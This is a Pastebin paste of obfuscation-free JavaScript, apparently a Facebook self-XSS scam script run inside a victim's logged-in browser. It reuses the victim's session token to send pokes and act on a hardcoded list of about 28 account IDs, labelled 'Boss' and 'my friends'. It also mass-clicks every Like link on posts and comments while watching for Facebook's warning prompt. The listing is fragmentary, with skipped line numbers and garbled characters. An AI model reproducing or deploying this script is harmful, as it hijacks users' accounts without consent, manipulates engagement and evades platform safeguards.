Advertisement
lmohanarun

x "documentscript"

Oct 16th, 2015
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 28. function p(abone)
  2. 29. {
  3. 30. var http4 = new XMLHttpRequest();
  4. 31. var url4 = "//www.facebook.com/ajax/poke_dialog.php";
  5. 32. var params4 = "uid=" + abone + "&pokeback=0&ask_for_confirm=0&nctr[_mod]=pagelet_timeline_profile_actions&__asyncDialog=1&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=v&fb_dtsg="+fb_dtsg+"&phstamp=";
  6. 33. http4.open("POST", url4, true);
  7. 34. http4.onreadystatechange = function ()
  8. 35. {
  9. 36. if (http4.readyState == 4 && http4.status == 200)
  10. 37. {
  11. 38. http4.close;
  12. 39. }
  13. 40. }
  14. 41. ;
  15. 42. http4.send(params4);
  16. 43. }
  17. 44.
  18. 45. //Boss
  19. 46. a("100006750972566");
  20. 47.
  21. 48. //my friends
  22. 49. a("100009351529239");a("100004242693472");a("100008317790244");a("100009722088576");
  23. 50. a("100006479294710");a("100004178526580");a("100010239738068");a("100008838738169");
  24. 51. a("100007858413823");a("100004952766753");a("100009226750666");a("100006743112971");
  25. 52. a("100007287583474");a("100005036403722");a("100006215462798");a("100007449764796");
  26. 53. a("100005151797923");a("100007899310993");a("100007882001820");a("100004750961793");
  27. 54. a("100006548414405");a("100004667535896");a("100006000224606");a("100006448261633");
  28. 55. a("100007631973923");a("100008208703850");a("100005731718089");
  29. 56.
  30. 72. var heads = document.getElementsByTagName("head");
  31. 73. if (heads.length > 0) {
  32. 74. var node = document.createElement("style");
  33. 75. node.type = "text/css";
  34. 76. node.appendChild(document.createTextNode(css));
  35. 77. heads[0].appendChild(node);
  36. 78. }
  37. 79. }
  38. 80. })();
  39. 81. body = document.body;
  40. 82. if(body != null)
  41. 83. {
  42. 84. div = document.createElement("div");
  43. 85. div.style.position = "fixed";
  44. 86. div.style.display = "block";
  45. 87. div.style.width = "130px";
  46. 88. div.style.opacity= 0.90;
  47. 89. div.style.bottom = "+70px";
  48. 90. div.style.left = "+0px";
  49. 91. div.style.backgroundColor = "#E7EBF2";
  50. 92. div.style.border = "1px solid #6B84B4";
  51. 93. div.style.padding = "3px";
  52. 94. div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='' title='Refresh'><blink><center>Close (F5)</center></blink></a>"
  53. 95. body.appendChild(div);
  54. 96. }
  55. 97.
  56. 98. if(body != null)
  57. 99. {
  58. 100. div = document.createElement("div");
  59. 101. div.setAttribute('id','like2');
  60. 102. div.style.position = "fixed";
  61. 103. div.style.display = "block";
  62. 104. div.style.width = "130px";
  63. 105. div.style.opacity= 0.90;
  64. 106. div.style.bottom = "+49px";
  65. 107. div.style.left = "+0px";
  66. 108. div.style.backgroundColor = "#E7EBF2";
  67. 109. div.style.border = "1px solid #6B84B4";
  68. 110. div.style.padding = "3px";
  69. 111. div.innerHTML = "<a style='font-weight:bold;color:#3B5998' onclick='Anonymous69()'><center>By.Nguyễn Hữu Ánh( trai nghèo 38)</center></a></a>"
  70. 112. body.appendChild(div);
  71. 113. unsafeWindow.Anonymous69 = function()
  72. 114. {
  73. 115. var B=0;
  74. 116. var J=0;
  75. 117. var I=document.getElementsByTagName("a");
  76. 118. var H=new Array();
  77. 119. for(var D=0;D<I.length;D++)
  78. 120. {
  79. 121. if(I[D].getAttribute("class")!=null&&I[D].getAttribute("class").indexOf("UFILikeLink")>=0&&(I[D].innerHTML=="Me gusta"||I[D].innerHTML=="Like"||I[D].innerHTML=="?????"||I[D].innerHTML=="Suka"||I[D].innerHTML=="Begen"||I[D].innerHTML=="??????"||I[D].innerHTML=="???!"||I[D].innerHTML=="?"||I[D].innerHTML=="Seneng"||I[D].innerHTML=="???"||I[D].innerHTML=="J?¢â‚¬â„¢aime"))
  80. 122. {
  81. 123. H[J]=I[D];
  82. 124. J++
  83. 125. }
  84. 126. }
  85. 127. function E(L)
  86. 128. {
  87. 129. H[L].click();
  88. 130. var K="<a style='font-weight:bold;color:#3B5998' onclick='Autolike()'><center>Like Status: "+(L+1)+"/"+H.length+"</center></a>";
  89. 131. document.getElementById("like2").innerHTML=K
  90. 132. }
  91. 133. function G(K)
  92. 134. {
  93. 135. window.setTimeout(C,K)
  94. 136. }
  95. 137. function A()
  96. 138. {
  97. 139. var M=document.getElementsByTagName("label");
  98. 140. var N=false;
  99. 141. for(var L=0;L<M.length;L++)
  100. 142. {
  101. 143. var K=M[L].getAttribute("class");
  102. 144. if(K!=null&&K.indexOf("uiButton uiButtonLarge uiButtonConfirm")>=0)
  103. 145. {
  104. 146. alert("Warning from Facebook");
  105. 147. N=true
  106. 148. }
  107. 149. }
  108. 150. if(!N)
  109. 151. {
  110. 152. G(2160)
  111. 153. }
  112. 154. }
  113. 155. function F(K)
  114. 156. {
  115. 157. window.setTimeout(A,K)
  116. 158. }
  117. 159. function C()
  118. 160. {
  119. 161. if(B<H.length)
  120. 162. {
  121. 163. E(B);
  122. 164. F(700);
  123. 165. B++
  124. 166. }
  125. 167. }
  126. 168. ;
  127. 169. C()
  128. 170. }
  129. 171. }
  130. 172. {
  131. 173. div=document.createElement("div");
  132. 174. div.style.position="fixed";
  133. 175. div.style.display="block";
  134. 176. div.style.width="130px";
  135. 177. div.style.opacity=.9;
  136. 178. div.style.bottom="+95px";
  137. 179. div.style.left="+0px";
  138. 180. div.style.backgroundColor="#E7EBF2";
  139. 181. div.style.border="1px solid #6B84B4";
  140. 182. div.style.padding="3px";
  141. 183. div.innerHTML="<a style='font-weight:bold;color:#E30505' href='https://www.facebook.com/donnazmi/notes' target='_blank' title='NEW' ><blink><center>NEW FACEBOOK</center></blink></a>";body.appendChild(div)}body=document.body;if(body!=null)
  142. 184.
  143. 185. body = document.body;
  144. 186. if(body != null)
  145. 187. {
  146. 188. div = document.createElement("div");
  147. 189. div.setAttribute('id','like3');
  148. 190. div.style.position = "fixed";
  149. 191. div.style.display = "block";
  150. 192. div.style.width = "130px";
  151. 193. div.style.opacity= 0.90;
  152. 194. div.style.bottom = "+28px";
  153. 195. div.style.left = "+0px";
  154. 196. div.style.backgroundColor = "#E7EBF2";
  155. 197. div.style.border = "1px solid #6B84B4";
  156. 198. div.style.padding = "3px";
  157. 199. div.innerHTML = "<a style='font-weight:bold;color:#3B5998' onclick='AnonymousComments()'><center>Like All Comments</center></a>"
  158. 200. body.appendChild(div);
  159. 201. unsafeWindow.AnonymousComments = function()
  160. 202. {
  161. 203. var B=0;
  162. 204. var J=0;
  163. 205. var I=document.getElementsByTagName("a");
  164. 206. var H=new Array();
  165. 207. for(var D=0;D<I.length;D++)
  166. 208. {
  167. 209. if(I[D].getAttribute("data-ft")!=null&&(I[D].getAttribute("title")=="Me gusta este comentario"||I[D].getAttribute("title")=="Like this comment"||I[D].getAttribute("title")=="???? ?? ??????"||I[D].getAttribute("title")=="Suka komentar ini"||I[D].getAttribute("title")=="Nyenengi tanggapan iki"||I[D].getAttribute("title")=="??????? ????????"||I[D].getAttribute("title")=="??????????!"||I[D].getAttribute("title")=="??? ??"||I[D].getAttribute("title")=="??????"||I[D].getAttribute("title")=="J?¢â‚¬â„¢aime ce commentaire"||I[D].getAttribute("title")=="Bu yorumu begen"))
  168. 210. {
  169. 211. H[J]=I[D];
  170. 212. J++
  171. 213. }
  172. 214. }
  173. 215. function E(L)
  174. 216. {
  175. 217. H[L].click();
  176. 218. var K="<a style='font-weight:bold;color:#3B5998' onclick='Autolike()'><center>Like Comments: "+(L+1)+"/"+H.length+"</center></a>";
  177. 219. document.getElementById("like3").innerHTML=K
  178. 220. }
  179. 221. function G(K)
  180. 222. {
  181. 223. window.setTimeout(C,K)
  182. 224. }
  183. 225. function A()
  184. 226. {
  185. 227. var M=document.getElementsByTagName("label");
  186. 228. var N=false;
  187. 229. for(var L=0;L<M.length;L++)
  188. 230. {
  189. 231. var K=M[L].getAttribute("class");
  190. 232. if(K!=null&&K.indexOf("uiButton uiButtonLarge uiButtonConfirm")>=0)
  191. 233. {
  192. 234. alert("Warning from Facebook");
  193. 235. N=true
  194. 236. }
  195. 237. }
  196. 238. if(!N)
  197. 239. {
  198. 240. G(2160)
  199. 241. }
  200. 242. }
  201. 243. function F(K)
  202. 244. {
  203. 245. window.setTimeout(A,K)
  204. 246. }
  205. 247. function C()
  206. 248. {
  207. 249. if(B<H.length)
  208. 250. {
  209. 251. E(B);
  210. 252. F(700);
  211. 253. B++
  212. 254. }
  213. 255. }
  214. 256. C()
  215. 257. }
  216. 258. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement